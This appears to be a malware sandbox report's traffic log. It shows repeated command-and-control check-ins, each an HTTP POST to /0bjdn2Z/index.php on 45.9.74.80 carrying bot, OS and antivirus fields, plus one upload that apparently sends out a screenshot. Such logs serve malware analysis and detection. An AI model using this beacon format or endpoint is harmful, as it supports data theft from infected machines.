                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTY5MjY=Host: 45.9.74.80Content-Length: 97078Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
